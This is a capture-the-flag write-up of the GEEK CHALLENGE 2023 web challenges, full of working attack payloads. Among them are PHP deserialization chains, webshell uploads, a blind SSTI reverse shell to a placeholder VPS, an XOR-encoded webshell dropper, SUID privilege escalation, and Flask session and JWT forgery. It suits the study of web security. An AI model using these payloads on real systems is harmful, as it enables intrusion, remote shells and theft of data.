14th Geek Challenge, GEEK CHALLENGE 2023‼️
Registration opens: October 25, 10 pm
Contest window: October 26, 8 pm to November 26, 8 pm
Platform: https://game.sycsec.com/
Categories include re, web, pwn, crypto, misc and more; this year's set also adds challenges built around the Yak language, so the directions are varied and the fun factor high.
This year there is also an off-campus leaderboard, so teams from other schools can win placement prizes too. Everyone is welcome to take up the challenge 💪.
Rank: 3
WEB
EzHttp
HTTP sign-in: click and receive the flag. http://1.117.175.65:23333/
robots.txt
leaks the account and password; log in, then satisfy each check in turn with a few request-header fields:
1 | POST / HTTP/1.1 |
unsign
Come and sign in first
highlight_file(__FILE__);
class syc
{
public $cuit;
public function __destruct()
{
echo("action!<br>");
$function=$this->cuit;
return $function();
}
}
class lover
{
public $yxx;
public $QW;
public function __invoke()
{
echo("invoke!<br>");
return $this->yxx->QW;
}
}
class web
{
public $eva1;
public $interesting;
public function __get($var)
{
echo("get!<br>");
$eva1=$this->eva1;
$eva1($this->interesting);
}
}
if (isset($_POST['url']))
{
unserialize($_POST['url']);
}
Deserialization chain: syc::__destruct() calls $this->cuit as a function, so cuit is a lover object whose __invoke() reads $this->yxx->QW; making yxx a web object (which has no accessible QW) fires web::__get(), which finally runs $eva1($interesting), i.e. system('cat /f*'):
1 | from phpserialize import serialize |
POST:
url=O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:2:"QW";s:1:"x";s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:7:"cat /f*";}}}
n00b_Upload
File-upload bypass: MIME type, image magic bytes, and a keyword filter. Craft the request header:
1 | Content-Type: image/png |
After the upload succeeds, visit uploadtest/378845_653a63ea1370a.php?x=cat /flag
to get the flag.
easy_php
You have learned PHP, so let's look at these bypasses.
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__FILE__);
include_once('flag.php');
if(isset($_GET['syc'])&&preg_match('/^Welcome to GEEK 2023!$/i', $_GET['syc']) && $_GET['syc'] !== 'Welcome to GEEK 2023!') {
if (intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024) {
if (isset($_POST['qw']) && $_POST['yxx']) {
$array1 = (string)$_POST['qw'];
$array2 = (string)$_POST['yxx'];
if (sha1($array1) === sha1($array2)) {
if (isset($_POST['SYC_GEEK.2023'])&&($_POST['SYC_GEEK.2023']="Happy to see you!")) {
echo $flag;
} else {
echo "再绕最后一步吧";
}
} else {
echo "好哩,快拿到flag啦";
}
} else {
echo "这里绕不过去,QW可不答应了哈";
}
} else {
echo "嘿嘿嘿,你别急啊";
}
}else {
echo "不会吧不会吧,不会第一步就卡住了吧,yxx会瞧不起你的!";
}
Layer 1: newline bypass. `$` in the regex also matches just before a trailing newline, so `Welcome to GEEK 2023!%0a` passes preg_match() while failing the strict `!==` comparison.
Layer 2: scientific notation against intval(). intval('2e5') returns 2 while '2e5' + 1 evaluates to 200001, so both bounds hold. This only works on PHP < 7.1: from 7.1 on, numeric strings in scientific notation are converted fully (intval('2e5') is 200000), so check the target's version before relying on it.
Layer 3: sha1 collision. Both values are cast to string, so either a genuine SHA-1 collision pair or two arrays (qw[]=1&yxx[]=2, which both cast to "Array") give equal hashes.
Layer 4: PHP's parameter-name parsing. PHP rewrites `.` in incoming parameter names to `_`, so $_POST['SYC_GEEK.2023'] cannot be set by sending that name literally; sending `SYC[GEEK.2023` works, because the first `[` is turned into `_` and the rest of the name is left untouched. The check uses `=` rather than `==`, so any non-empty value passes.
1 | POST /?syc=Welcome%20to%20GEEK%202023!%0a&lover=2e5 HTTP/1.1 |
ctf_curl
Command execution? Really?
highlight_file('index.php');
// curl your domain
// flag is in /tmp/Syclover
if (isset($_GET['addr'])) {
$address = $_GET['addr'];
if(!preg_match("/;|f|:|\||\&|!|>|<|`|\(|{|\?|\n|\r/i", $address)){
$result = system("curl ".$address."> /dev/null");
} else {
echo "Hacker!!!";
}
}
Use a VPS and curl's output-file option to drop a file. The filter blocks `:` (so no scheme; curl defaults to http), `?`, `&`, `|`, `;` and the letter `f`, but `-o` and a bare host survive:
?addr=-o%201.php%20x.x.x.x/1.txt
Lowercase `-o` writes the response to the named file; capital `-O` would instead name the file after the remote path, so with that flag the payload would have to be served as 1.php (e.g. `x.x.x.x/1.php -O`). The executed command is `curl -o 1.php x.x.x.x/1.txt> /dev/null`, so nothing is echoed back.
1.txt contains: <?php system("cat /tmp/Syclover");?>
Visit 1.php to get the flag.
klf_ssti
"De1ty's friend from Guangdong confessed to his crush and got called a klf; now he's furious. Do you know what klf means? He still insists he isn't the klf and you are. Can you grab the flag and prove he is the klf..."
Route: /hack?klf=xxx
No filtering, but no output either: a blind SSTI. Use Python to pop a reverse shell back to a VPS (x.x.x.x:7777 below is the listener):
/hack?klf={%print(config.__class__.__init__.__globals__['os'].popen('python3 -c \'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("x.x.x.x",7777));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")\' ').read())%}
The flag is in the root directory.
ez_remove
I want to go back into the furnace and be remade; how about it, don't you want that too?
highlight_file(__FILE__);
class syc{
public $lover;
public function __destruct()
{
eval($this->lover);
}
}
if(isset($_GET['web'])){
if(!preg_match('/lover/i',$_GET['web'])){
$a=unserialize($_GET['web']);
throw new Error("快来玩快来玩~");
}
else{
echo("nonono");
}
}
Deserialization. The keyword filter on lover is bypassed with the `S` string type, which accepts hex escapes (`\6c` is `l`), and the final closing brace is dropped so that unserialize() fails on the truncated input: the half-built object is freed immediately and its __destruct() runs before the Error is thrown.
The flag in the root directory could not be read because open_basedir is set; the chdir()/ini_set() trick walks out of it and then reads the file:
/?web=O:3:"syc":1:{S:5:"\6cover";s:142:"mkdir('test');chdir('test');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');readgzfile('/f1ger');";
ez_path
Come join my blog!
A comment in the source says: <!--the secret is in the f14444 file in the root directory, don't forget-->
The front page leaks the file app.cpython-39.pyc; decompiling it gives the Python source:
1 | import os, uuid |
Exploit the absolute-path join:
os.path.join(path, *paths) joins several path components into one path. The first argument is normally the base path and each following argument is appended to it as a component.
The function has a less-known property, though: if any component begins with /, everything before it, base path included, is thrown away and that component is treated as an absolute path.
os.path.join('articles/', '/f14444') == '/f14444'
So on the /upload route, POST title=/f14444&content=qwe to get the flag.
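As an added example (not code from the challenge or its decompiled app), the following Python reproduces the join the upload handler performs and sets a confined variant beside it. ARTICLE_DIR is assumed from the 'articles/' base path quoted above; title stands for the POSTed field.

```python
import posixpath

# Added example, not the challenge's decompiled code. ARTICLE_DIR mirrors the
# 'articles/' base directory in the os.path.join call quoted above; the title is
# the user-controlled POST field. posixpath is used so the behaviour is the same
# on any host (os.path.join on Linux is posixpath.join).
ARTICLE_DIR = "articles/"


def unsafe_article_path(title: str) -> str:
    """The vulnerable join: an absolute title discards ARTICLE_DIR entirely."""
    return posixpath.join(ARTICLE_DIR, title)


def safe_article_path(title: str) -> str:
    """Join, normalise, and require the result to stay inside ARTICLE_DIR.

    Rejects absolute components (/f14444), traversal (../../f14444) and NUL
    bytes. normpath is purely lexical; on a real filesystem also resolve
    symlinks with os.path.realpath on both sides before comparing.
    """
    base = posixpath.normpath(ARTICLE_DIR)
    if posixpath.isabs(title) or "\x00" in title:
        raise ValueError(f"rejected component: {title!r}")
    full = posixpath.normpath(posixpath.join(base, title))
    if full != base and not full.startswith(base + "/"):
        raise ValueError(f"{full!r} escapes {base!r}")
    return full


def is_confined(title: str) -> bool:
    """True when safe_article_path accepts the title."""
    try:
        safe_article_path(title)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for title in ["hello.md", "sub/../note.md", "/f14444", "../../f14444", "sub/../../x"]:
        verdict = "ok" if is_confined(title) else "REJECTED"
        print(f"{title!r:16} unsafe -> {unsafe_article_path(title)!r:22} confined -> {verdict}")
```

The confined version deliberately refuses rather than "fixes" a bad title: silently stripping a leading slash would still let `../` sequences through, and the lexical check alone is not enough once symlinks exist under the base directory.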
you konw flask?
At a driving school, shouldn't you at least be an instructor?
Scanning finds robots.txt, which leaks 3ysd8.html; its source carries a comment:
<!-- the key is app.secret_key = 'wanbao'+base64.b64encode(str(random.randint(1, 100)).encode('utf-8')).decode('utf-8')+'wanbao' (www, my cute Wanbao, I stored it securely enough, right?) -->
Only 100 values are possible, so build a dictionary for brute-forcing the secret_key:
1 | import base64 |
Brute-force the Flask session's secret_key:
flask-unsign --unsign --cookie 'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJ4eHgiLCJ1c2VyX2lkIjozfQ.ZUOYig.x1sFiE5HRT9q5bGAwSF6wMnZfOM' --wordlist dict.txt
With the secret_key recovered, forge an admin Flask session:
flask-unsign --sign --cookie "{'is_admin': True, 'name': 'xxx', 'user_id': 3}" --secret 'wanbaoNTc=wanbao'
Enter the student management page and find the flag:
"Since you are the instructor, this flag student is yours" SYC{naCcuTYu2mu0c33Fen}
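As an added example (not the writeup's script and not flask-unsign), this Python re-implements the signing Flask applies to its session cookie so the candidate keys can be checked offline and an admin cookie forged once the key is known. It assumes the cookie and key formula quoted above; `wanbaoNTc=wanbao`, the secret the writeup recovered, is what the search is expected to land on.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Added example, not the writeup's or flask-unsign's code. It re-implements the
# scheme Flask uses for its session cookie (itsdangerous URLSafeTimedSerializer:
# salt "cookie-session", HMAC key derivation, SHA-1), builds the 100-entry
# wordlist the leaked formula implies, and forges a cookie with the found key.

SALT = b"cookie-session"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def derive_key(secret: bytes) -> bytes:
    """itsdangerous key_derivation='hmac': the signing key is HMAC(secret, salt)."""
    return hmac.new(secret, SALT, hashlib.sha1).digest()


def sign_session(payload: dict, secret: bytes, timestamp: Optional[int] = None) -> str:
    """Build payload.timestamp.signature the way Flask's SecureCookieSessionInterface does."""
    ts = int(time.time()) if timestamp is None else timestamp
    body = _b64url(json.dumps(payload, separators=(",", ":"), sort_keys=True).encode())
    ts_b64 = _b64url(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = f"{body}.{ts_b64}".encode()
    sig = hmac.new(derive_key(secret), value, hashlib.sha1).digest()
    return f"{body}.{ts_b64}.{_b64url(sig)}"


def verify_session(cookie: str, secret: bytes) -> Optional[dict]:
    """Return the session dict if the cookie was signed with `secret`, else None."""
    try:
        body, ts_b64, sig_b64 = cookie.rsplit(".", 2)
    except ValueError:
        return None
    value = f"{body}.{ts_b64}".encode()
    expected = hmac.new(derive_key(secret), value, hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    if body.startswith("."):                      # Flask zlib-compresses large payloads
        return json.loads(zlib.decompress(_b64url_decode(body[1:])))
    return json.loads(_b64url_decode(body))


def leaked_wordlist() -> list:
    """'wanbao' + base64(str(randint(1, 100))) + 'wanbao', from the HTML comment."""
    return [b"wanbao" + base64.b64encode(str(i).encode()) + b"wanbao" for i in range(1, 101)]


def recover_secret(cookie: str, candidates) -> Optional[bytes]:
    for secret in candidates:
        if verify_session(cookie, secret) is not None:
            return secret
    return None


if __name__ == "__main__":
    # The cookie captured in the writeup; once the secret is known the forged
    # cookie flips is_admin exactly as the flask-unsign --sign call does.
    captured = ("eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJ4eHgiLCJ1c2VyX2lkIjozfQ"
                ".ZUOYig.x1sFiE5HRT9q5bGAwSF6wMnZfOM")
    secret = recover_secret(captured, leaked_wordlist())
    print("recovered secret:", secret)
    if secret:
        print("forged:", sign_session({"is_admin": True, "name": "xxx", "user_id": 3}, secret))
```

The middle segment of the cookie is the signing timestamp (ZUOYig decodes to 1698928778, a date inside the contest window); it is covered by the signature, so a forged cookie simply carries a fresh one.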
Pupyy_rce
What is this? Run it.
highlight_file(__FILE__);
header('Content-Type: text/html; charset=utf-8');
error_reporting(0);
include(flag.php);
//当前目录下有好康的😋
if (isset($_GET['var']) && $_GET['var']) {
$var = $_GET['var'];
if (!preg_match("/env|var|session|header/i", $var,$match)) {
if (';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $var)){
eval($_GET['var']);
}
else die("WAF!!");
} else{
die("PLZ DONT HCAK ME😅");
}
}
Parameterless RCE. localeconv() returns an array whose first element is the decimal point ".", current() picks it out, and scandir(".") lists the working directory: ?var=print_r(scandir(current(localeconv())));
Result:
Array ( [0] => . [1] => .. [2] => error.log [3] => fl@g.php [4] => genshin01.txt [5] => index.php [6] => tiangou01.txt [7] => tiangou02.txt )
Visit fl@g.php
to get the flag.
雨
VanZY wrote a postcard to his first love; go help him sign his id on it.
Visiting /source is refused, with the hint <!--Maybe you can view /hint-->.
Visiting /hint gives: I heard that the challenge maker likes to use his own id as secret_key.
Decode the JWT at jwt.io, re-sign it with secret_key=VanZY, and /source returns the code:
1 | const express = require('express'); |
The /code route calls putil_merge(); through the putil-merge prototype pollution vulnerability (CVE-2021-23470), pollute Super so that the check Super['userrole'] === 'Superadmin' inside the /create route holds:
1 | POST /code |
Inside the /create route, hit the ejs RCE (CVE-2022-29078); see: ejs RCE CVE-2022-29078 bypass.
1 | POST /create HTTP/1.1 |
Catch the reverse shell on the VPS and cat /Yupr0m1sing_f1ll4agggXD to get the flag: SYC{Chun_a1_M4n_NeVer_G1ve_Up}.
famale_imp_l0ve
"The mesugaki took one look at o2takuXX's girlfriend and said: 'Hmph~ is... is it really that long? What a small fry~❤'. Can you help him?"
A comment in the source points to an include.php file.
Together with the front page's upload form and the hint about compression, this tests zip inclusion. Create a zip archive containing a PHP script with the code <?php system($_GET[x]); and build the zip://php.zip#php.jpg stream path. The # must be sent URL-encoded as %23, otherwise the client strips it as a URL fragment:
/include.php?file=zip://php.zip%23php.jpg&x=cat /flag
to get the flag.
change_it
Come find the flag! (the upload directory is "/upload")
Viewing the page source gives the username and password user/user; it also contains:
1 | <!-- Can't connect? Not connecting is the point! --> |
JWT forgery: brute-force the secret with c-jwt-cracker:
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJRaW5nd2FuIiwibmFtZSI6InVzZXIiLCJhZG1pbiI6ImZhbHNlIn0.gzCFCz2Hw5c_EIjcM2lQ2QL3aDW3rAAHU2ZQ50_tnY4
which reports Secret is "yibao".
Build the JWT for {"iss": "Qingwan","name": "admin","admin": "true"}:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJRaW5nd2FuIiwibmFtZSI6ImFkbWluIiwiYWRtaW4iOiJ0cnVlIn0.qs6tjnaghMXiTsvqEMUauz_JGzxxKdtaXPGVtQUEHek
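As an added example (not the writeup's or c-jwt-cracker's code), a standard-library HS256 verifier and signer: it checks a candidate secret against a token and re-issues the token with admin claims, with the algorithm pinned to HS256 so a forged alg=none token is refused. The header and claim layout follow the token quoted above; `yibao` is the secret the writeup recovered.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Added example, not the writeup's code. Minimal HS256 JWT handling with only
# the standard library; HEADER matches the first segment of the tokens above.

HEADER = {"typ": "JWT", "alg": "HS256"}


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def jwt_sign(claims: dict, secret: bytes) -> str:
    header = _b64url(json.dumps(HEADER, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def jwt_verify(token: str, secret: bytes) -> Optional[dict]:
    """Claims if the HS256 signature checks out, else None.

    The algorithm is pinned before any crypto runs, so alg=none and
    algorithm-confusion headers are rejected outright.
    """
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
    except ValueError:
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return json.loads(_b64url_decode(body_b64))


def forge_admin(token: str, secret: bytes) -> str:
    """Re-issue the token with name=admin, admin="true" under the cracked secret."""
    claims = jwt_verify(token, secret)
    if claims is None:
        raise ValueError("secret does not verify this token")
    return jwt_sign({**claims, "name": "admin", "admin": "true"}, secret)


if __name__ == "__main__":
    user_token = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9"
                  ".eyJpc3MiOiJRaW5nd2FuIiwibmFtZSI6InVzZXIiLCJhZG1pbiI6ImZhbHNlIn0"
                  ".gzCFCz2Hw5c_EIjcM2lQ2QL3aDW3rAAHU2ZQ50_tnY4")
    print(jwt_verify(user_token, b"yibao"))
    print(forge_admin(user_token, b"yibao"))
```

Because the claims are re-serialised in their original key order with compact separators, the forged token's middle segment is byte-identical to the one produced by jwt.io for the same JSON; only the signature depends on the secret.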
The change.html source leaks the renaming logic: the stored file name is derived from a PHP pseudo-random number (the kind of seed php_mt_seed recovers). Intercept the upload and set the file name to 1.php:
1 | POST /change.php HTTP/1.1 |
Upload, and brute-force the candidate file names at the same time (the PHP snippet was run at https://3v4l.org/UvLQQ#v8.0.30).
Then probe which of the generated names actually exists:
1 | import requests |
Visit it to get the flag.
ezrfi
Dear Syclover, can you find the flag????
Only .py files can be read; by trial, ?file=/var/hint works:
secret="w5YubyBvd08gMHcwIG92MCDDlndvIE8ubyAwLjAgMC5vIMOWdjAgMHbDliBPdjAgT3fDliBvLk8gw5Z2TyAwXzAgMF9PIG8uTyAwdjAgw5ZfbyBPd28gw5Z2TyDDli5PIMOWXzAgTy5PIMOWXzAgMHbDliAwLjAgw5Z2w5Ygw5Z3MCBPdsOWIMOWdjAgT1/DliDDlnZPIMOWLk8gw5Z3MCBvd8OWIMOWLm8gTy5vIMOWXzAgMHbDliDDlndvIE93w5YgTy5vIE93TyBvX28gw5YuTyBvLm8gb3dPIMOWXzAgb3dPIMOWXzAgMHZvIG8uTyBPd8OWIE92byAwLsOWIMOWdjAgTy7DliAwLjAgMHfDliBvLsOWIG93byBvdzAgMHZvIMOWLm8gb3dPIG9fMCDDli5PIG9fbyBPd8OWIE8ubyBvdzAgw5ZfbyBvd28gw5YuMCDDlnZPIG9fTyBPLsOWIE92MCBPdzAgby7DliAwdjAgT3YwIE9fTyBvLk8gT3bDliDDlnYwIMOWXzAgw5Z3byBvd08gT19vIE93w5Ygby5PIMOWdk8gby4wIDBfMCDDll9vIG93TyBPXzAgMC7DliDDli5vIE8uTyBPdzAgT19vIMOWdjAgb3cwIMOWdjAgT18wIMOWdm8gw5Z2w5Ygw5ZfbyAwX8OWIMOWdm8gw5Z2w5YgMHcwIE92w5Ygw5YubyDDli4wIMOWLm8gb3ZvIMOWLjAgw5YuMCAwd28gb3dPIG8uTyAwd8OWIDB2MCBvd8OWIMOWdzAgw5YubyAwdzAgT1/DliBvX08gw5Z2byAg"
base64-decoding gives:
Ö.o owO 0w0 ov0 Öwo O.o 0.0 0.o Öv0 0vÖ Ov0 OwÖ o.O ÖvO 0_0 0_O o.O 0v0 Ö_o Owo ÖvO Ö.O Ö_0 O.O Ö_0 0vÖ 0.0 ÖvÖ Öw0 OvÖ Öv0 O_Ö ÖvO Ö.O Öw0 owÖ Ö.o O.o Ö_0 0vÖ Öwo OwÖ O.o OwO o_o Ö.O o.o owO Ö_0 owO Ö_0 0vo o.O OwÖ Ovo 0.Ö Öv0 O.Ö 0.0 0wÖ o.Ö owo ow0 0vo Ö.o owO o_0 Ö.O o_o OwÖ O.o ow0 Ö_o owo Ö.0 ÖvO o_O O.Ö Ov0 Ow0 o.Ö 0v0 Ov0 O_O o.O OvÖ Öv0 Ö_0 Öwo owO O_o OwÖ o.O ÖvO o.0 0_0 Ö_o owO O_0 0.Ö Ö.o O.O Ow0 O_o Öv0 ow0 Öv0 O_0 Övo ÖvÖ Ö_o 0_Ö Övo ÖvÖ 0w0 OvÖ Ö.o Ö.0 Ö.o ovo Ö.0 Ö.0 0wo owO o.O 0wÖ 0v0 owÖ Öw0 Ö.o 0w0 O_Ö o_O Övo
Decoding the 尊嘟假嘟 (zundu-jiadu) emoticon cipher gives:
Shy0JhFpsi+njV0IfFfzS44KIcwPFg312qo6gfdk0+DzcoMdSgVs15cERxpqnPJh4Y3b3i/mcbkPlHGTIA6/A8CQU8UX6j9w5HKy
Following the hint, RC4-decrypt with key=Syclover to get:
The inclusion logic is include($file.".py"); can you find where the flag file is??
Reference: LFI 新姿势学习 (new LFI tricks). Use the file inclusion to get RCE:
1 | import requests |
EzRce
can you rce me??? Replace spaces in the flag with underscores
include('waf.php');
session_start();
show_source(__FILE__);
error_reporting(0);
$data=$_GET['data'];
if(waf($data)){
eval($data);
}else{
echo "no!";
}
Blind-testing the WAF shows this is a no-alphanumeric RCE. XOR is allowed, so XOR every byte of the wanted string with %A0: each result is a non-printable high byte, and PHP's ^ on two strings XORs them back into the original name at runtime.
phpinfo():
?data=(%A0%A0%A0%A0%A0%A0%A0^%D0%C8%D0%C9%CE%C6%CF)();
phpinfo shows disable_functions contains:
exec,system,fwrite,passthru,popen,shell_exec,error_log,fputs,file_get_contents,assert,call_user_func,call_user_func_array,array_map,array_filter,array_reduce,get_defined_vars,getallheaders
Read the WAF with readgzfile('waf.php'):
?data=(%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0^%D2%C5%C1%C4%C7%DA%C6%C9%CC%C5)(%A0%A0%A0%A0%A0%A0%A0^%D7%C1%C6%8E%D0%C8%D0);
waf.php
Drop a webshell with file_put_contents('2.php','<?php eval($_POST[1]);'):
?data=(%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0^%C6%C9%CC%C5%FF%D0%D5%D4%FF%C3%CF%CE%D4%C5%CE%D4%D3)((%A0%A0%A0%A0%A0^%92%8E%D0%C8%D0),(%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0%A0^%9C%9F%D0%C8%D0%80%C5%D6%C1%CC%88%84%FF%F0%EF%F3%F4%FB%91%FD%89%9B));
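As an added example (not the writeup's script), this Python generates and decodes the XOR payloads above. The mask byte 0xA0 is the writeup's choice; any mask that keeps every byte outside [A-Za-z0-9] works the same way.

```python
from urllib.parse import unquote_to_bytes

# Added example, not the writeup's script. Generates and decodes the
# no-alphanumeric payloads used against EzRce. PHP's ^ on two strings XORs them
# byte by byte, so (A ^ B)(...) calls the function named A XOR B. With
# A = "\xa0" repeated, any printable byte c becomes c ^ 0xa0 in 0x80..0xde,
# which is neither a letter nor a digit, so no alphanumeric byte ever reaches
# the filter. MASK is the byte the writeup chose (%A0).

MASK = 0xA0


def xor_literal(text: str) -> str:
    """URL-encoded PHP expression (MASK*n ^ text^MASK) that evaluates to `text`."""
    raw = text.encode("latin-1")
    left = "".join(f"%{MASK:02X}" for _ in raw)
    right = "".join(f"%{b ^ MASK:02X}" for b in raw)
    return f"({left}^{right})"


def call(func: str, *args: str) -> str:
    """func(arg, ...); with the name and every string argument as an XOR literal."""
    return xor_literal(func) + "(" + ",".join(xor_literal(a) for a in args) + ");"


def decode_literal(expr: str) -> str:
    """Invert one literal, e.g. from a WAF log: '(%A0%A0^%D0%C8)' -> 'ph'."""
    left, right = expr.strip("()").split("^")
    a, b = unquote_to_bytes(left), unquote_to_bytes(right)
    return bytes(x ^ y for x, y in zip(a, b)).decode("latin-1")


def alnum_free(payload: str) -> bool:
    """True if the URL-decoded payload contains no ASCII letter or digit."""
    return not any(b < 0x80 and chr(b).isalnum() for b in unquote_to_bytes(payload))


if __name__ == "__main__":
    for p in (call("phpinfo"),
              call("readgzfile", "waf.php"),
              call("file_put_contents", "2.php", "<?php eval($_POST[1]);")):
        print(alnum_free(p), "?data=" + p)
```

From the defender's side, decode_literal() is the useful half: a WAF that only pattern-matches function names never sees "phpinfo" in the request, but URL-decoding and XORing the two halves of every `(...^...)` pair recovers the call before the filter decides.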
Connect with AntSword. find / -perm -u=s -type f 2>/dev/null shows that /usr/bin/find has the SUID bit set, so escalate privileges through find:
1 | cd /tmp |
Flag: SYC{ThE_RCe is S0 Eas1ly_DD!}
ezpython
can you pollute me?
import json
import os
from waf import waf
import importlib
from flask import Flask,render_template,request,redirect,url_for,session,render_template_string
app = Flask(__name__)
app.secret_key='jjjjggggggreekchallenge202333333'
class User():
def __init__(self):
self.username=""
self.password=""
self.isvip=False
class hhh(User):
def __init__(self):
self.username=""
self.password=""
registered_users=[]
def hello_world(): # put application's code here
return render_template("welcome.html")
def play():
username=session.get('username')
if username:
return render_template('index.html',name=username)
else:
return redirect(url_for('login'))
def login():
if request.method == 'POST':
username=request.form.get('username')
password=request.form.get('password')
user = next((user for user in registered_users if user.username == username and user.password == password), None)
if user:
session['username'] = user.username
session['password']=user.password
return redirect(url_for('play'))
else:
return "Invalid login"
return redirect(url_for('play'))
return render_template("login.html")
def register():
if request.method == 'POST':
try:
if waf(request.data):
return "fuck payload!Hacker!!!"
data=json.loads(request.data)
if "username" not in data or "password" not in data:
return "连用户名密码都没有你注册啥呢"
user=hhh()
merge(data,user)
registered_users.append(user)
except Exception as e:
return "泰酷辣,没有注册成功捏"
return redirect(url_for('login'))
else:
return render_template("register.html")
def flag():
user = next((user for user in registered_users if user.username ==session['username'] and user.password == session['password']), None)
if user:
if user.isvip:
data=request.args.get('num')
if data:
if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <=10:
flag = os.environ.get('geek_flag')
return render_template('flag.html',flag=flag)
else:
return "你的数字不对哦!"
else:
return "I need a num!!!"
else:
return render_template_string('这种神功你不充VIP也想学?<p><img src="{{url_for(\'static\',filename=\'weixin.png\')}}">要不v我50,我送你一个VIP吧,嘻嘻</p>')
else:
return "先登录去"
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
if __name__ == '__main__':
app.run(host="0.0.0.0",port="8888")
The code contains a merge() function; see: Python prototype-chain pollution variants (prototype-pollution-in-python).
The waf blocks the substring isvip, so write it with a JSON Unicode escape: the raw body never contains "isvip", but json.loads() turns "is\u0076ip" back into it. The payload walks __class__ -> __base__ because hhh.__init__ never sets isvip: a setattr on the parent class User makes every hhh instance report isvip as truthy.
POST to /register: {"username":"xx","password":"yy","__class__" : {"__base__" : {"is\u0076ip" : 1}}}
Then log in and visit /flag, using + to get past the number check: /flag?num=+123456789
The conditions are: no '0' in the string, the string not equal to "123456789", int() of it equal to 123456789, and at most 10 characters. A literal + in a query string is decoded as a space, so the server actually sees " 123456789"; int() accepts both leading whitespace and a leading +, so the check passes either way (send %2B for a literal plus). View the page source to get the flag.
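As an added example (not the challenge's own code), the Python below reproduces the gadget with the same User/hhh classes and the same merge(), runs the register payload through it, and contrasts a merge that refuses dunder keys. The waf() stand-in is assumed: a substring match on the raw request body, which is what the Unicode escape is evading.

```python
import json

# Added example, not the challenge's own code. Reproduces the ezpython gadget
# with the same User/hhh classes and the same merge() so the effect of the
# register payload can be observed offline, and contrasts a merge that refuses
# to walk dunder attributes. waf() is an assumed stand-in for the challenge's
# waf module: a plain substring match on the raw body.


class User:
    def __init__(self):
        self.username = ""
        self.password = ""
        self.isvip = False


class hhh(User):
    # Never sets isvip, so attribute lookup on an hhh instance falls through
    # to the class chain: polluting User.isvip flips every hhh to VIP.
    def __init__(self):
        self.username = ""
        self.password = ""


def merge(src, dst):
    """The challenge's merge(), unchanged: setattr walks into __class__/__base__."""
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


def safe_merge(src, dst):
    """Copy only scalar values onto attributes the instance itself already defines."""
    for k, v in src.items():
        if k.startswith("_") or k not in vars(dst):
            raise ValueError(f"refusing to set {k!r}")
        if isinstance(v, (dict, list)):
            raise ValueError(f"nested value not allowed for {k!r}")
        setattr(dst, k, v)


def waf(raw: bytes) -> bool:
    return b"isvip" in raw


# The register body from the writeup: \u0076 is 'v', so the JSON parser sees
# "isvip" while the byte-level waf does not.
PAYLOAD = b'{"username":"xx","password":"yy","__class__":{"__base__":{"is\\u0076ip":1}}}'


def register(raw: bytes, merger=merge):
    """Mirror of the /register handler: waf, json.loads, merge into a fresh hhh()."""
    if waf(raw):
        raise PermissionError("fuck payload!Hacker!!!")
    data = json.loads(raw)
    user = hhh()
    merger(data, user)
    return user


def register_safely(raw: bytes):
    """register() with safe_merge; None when the payload is refused."""
    try:
        return register(raw, merger=safe_merge)
    except (PermissionError, ValueError):
        return None


def is_vip(user) -> bool:
    return bool(getattr(user, "isvip", False))


def reset_pollution():
    """Remove the class-level attribute so the demo can be re-run."""
    if "isvip" in vars(User):
        del User.isvip


if __name__ == "__main__":
    print("fresh hhh vip?", is_vip(hhh()))
    register(PAYLOAD)
    print("after pollution, brand-new hhh vip?", is_vip(hhh()))
    reset_pollution()
    print("safe_merge accepts payload?", register_safely(PAYLOAD) is not None)
```

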